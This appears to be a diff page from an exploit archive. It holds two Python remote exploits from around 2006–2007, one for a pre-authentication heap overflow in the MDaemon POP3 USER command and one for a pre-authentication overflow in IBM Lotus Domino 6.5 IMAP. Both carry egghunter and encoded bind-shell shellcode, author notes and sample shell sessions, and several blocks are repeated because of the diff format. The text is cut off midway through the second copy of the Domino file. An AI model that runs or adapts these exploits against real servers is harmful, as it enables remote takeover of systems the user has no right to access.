ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"
buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
for x in range(5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n')
s.send('QUIT\r\n')
s.close()
sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)
# milw0rm.com [2006-08-26]
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
#
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
# and looks suspiciously similar to XP SP2...
# Note that my unpatched win2k was last patched 2-3 weeks ago,
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
########################################################################################
#
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
########################################################################################
host="192.168.220.128"
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"
buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
for x in range(5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n')
s.send('QUIT\r\n')
s.close()
sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)
# milw0rm.com [2006-08-26]

290
platforms/windows/remote/3616.py
View file

@ -1,145 +1,145 @@
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com
# Notes:
# * Not the the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
#
# [*] Triggering overwrite, ph33r.
# [*] You may need to wait up to 2 minutes
# [*] for egghunter to find da shell.
# bt ~ # date
# Sat Mar 31 11:47:07 GMT 2007
# bt ~ # nc -v 192.168.0.38 4444
# 192.168.0.38: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
#C:\Lotus\Domino>
import sys
import md5
import struct
import base64
import socket
def sendbind(target):
bindshell ="\x90"* 400 # Metasploit bind shell port 4444
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
bind = 'a001 admin ' + bindshell +'\r\n'
print "[*] Sending bindshell *somewhere* into memory"
sock.send(bind)
response = sock.recv(1024)
sock.close()
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a001 authenticate cram-md5\r\n'
sock.send(auth)
response = sock.recv(1024)
print response
m = md5.new()
m.update(response[2:0])
digest = m.digest()
payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
# 0x774b4c6a CALL [EAX +4]
payload += "jLKw"
payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
login = payload + ' ' + digest
login = base64.encodestring(login) + '\r\n'
print "[*] Triggering overwrite, ph33r."
sock.send(login)
sock.close()
print "[*] You may need to wait up to 2 minutes"
print "[*] for egghunter to find da shell."
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
print '[*] Usage: %s <imap server>\n' % sys.argv[0]
sys.exit(-1)
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
sendbind(target)
sendbind(target)
sendbind(target)
sendbind(target)
ExploitLotus(target)
# milw0rm.com [2007-03-31]
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com
# Notes:
# * Not the the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
#
# [*] Triggering overwrite, ph33r.
# [*] You may need to wait up to 2 minutes
# [*] for egghunter to find da shell.
# bt ~ # date
# Sat Mar 31 11:47:07 GMT 2007
# bt ~ # nc -v 192.168.0.38 4444
# 192.168.0.38: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
#C:\Lotus\Domino>
import sys
import md5
import struct
import base64
import socket
def sendbind(target):
bindshell ="\x90"* 400 # Metasploit bind shell port 4444
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
